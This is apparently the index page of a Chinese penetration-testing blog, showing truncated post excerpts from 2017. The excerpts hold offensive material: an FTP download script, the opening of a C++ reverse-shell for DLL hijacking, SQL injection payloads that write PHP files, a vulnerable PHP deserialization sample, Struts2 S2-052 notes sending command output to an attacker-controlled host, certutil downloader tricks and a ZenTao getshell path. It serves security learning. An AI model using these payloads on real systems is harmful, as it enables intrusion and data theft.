baozi|学与用

生活其实很简单，过了今天就是明天。

首页

关于

热门通过ftp下载文件

时间：2017-11-11 作者：webbaozi 分类：小技巧热度：1247°

时间：2017-11-11 分类：小技巧热度：1247

通过ftp下载文件 echo open 192.168.107.128 >>ftp echo lpl>>ftp echo lpl>>ftp echo get 2.txt >>ftp ftp -s:ftp

热门 c++反弹代码

时间：2017-10-30 作者：webbaozi 分类：渗透测试热度：1250°

时间：2017-10-30 分类：渗透测试热度：1250

在dll劫持中使用挺不错的，之前放在nopad++中，成功反弹。代码如下: LPCSTR szMyUniqueNamedEvent = "sysnullevt"; HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent); switch (GetLastError()) { // app is already running case ERROR_ALREADY_EXISTS: { CloseHandle(m_hEvent); bre...

热门通过mysql注入写文件

时间：2017-10-30 作者：webbaozi 分类：小技巧热度：2013°

时间：2017-10-30 分类：小技巧热度：2013

1. select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php' 2. select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E-- 此写法需要查询出数据,才能...

热门 php反序列小记

时间：2017-10-21 作者：webbaozi 分类：小技巧热度：1310°

时间：2017-10-21 分类：小技巧热度：1310

存在反序列漏洞的php代码 <html> <head> <title>WEB</title> </head> <body> <?php class Readflag{ var $file; function __destruct(){ if(isset($this->file)){ echo file_get_contents($this->file); } } function __wakeup(){ if($this->fi...

热门 struts2-02-052复现笔记

时间：2017-9-6 作者：webbaozi 分类：小技巧热度：1192°

时间：2017-9-6 分类：小技巧热度：1192

struts2-02-052复现笔记

网上已经有很多复现过程了，这里就做个笔记 vps上执行: python -m SimpleHTTPServer 8080 然后执行命令powershell "curl http://ip:port/index.php?whoami=$(whoami)" powershell支持curl(测试机win7powershell不支持curl，未测) POST /struts2-rest-showcase/orders/4 HTTP/1.1 Host: 192.168.1.212 User-Agen...

热门渗透测试中的certutil

时间：2017-8-10 作者：webbaozi 分类：小技巧热度：3373°

时间：2017-8-10 分类：小技巧热度：3373

0x00 前言最近在Casey Smith‏ @subTee的twitter上学到了关于certutil的一些利用技巧。本文将结合自己的一些经验，介绍certutil在渗透测试中的应用，对cmd下downloader的实现方法作补充，总结base64编码转换的常用方法。学习地址： https://twitter.com/subTee/status/888101536475344896 https://twitter.com/subTee/status/888071631528235010 0x01 简介本文...

热门禅道后台getshell,利用windows特性,快速确定文件名

时间：2017-7-31 作者：webbaozi 分类：小技巧热度：1650°

时间：2017-7-31 分类：小技巧热度：1650

禅道后台getshell,利用windows特性,快速确定文件名

如何上传文件请移步:http://www.webbaozi.com/dmsj/18.html 这里就不多讲了 window特性: 双引号(""") <==> 点号(".")'; 大于符号(">") <==> 问号("?")'; 小于符号("<") <==> 星号("*")'; 进入正题: index.php ?m=editor &f=edit &filePath=YWFh &action=override &isExtends...

1 2 3 4 5 6 7 ... »

返回顶部首页手机版本
版权所有：baozi|学与用站长： webbaozi 蜀ICP备16032848号-1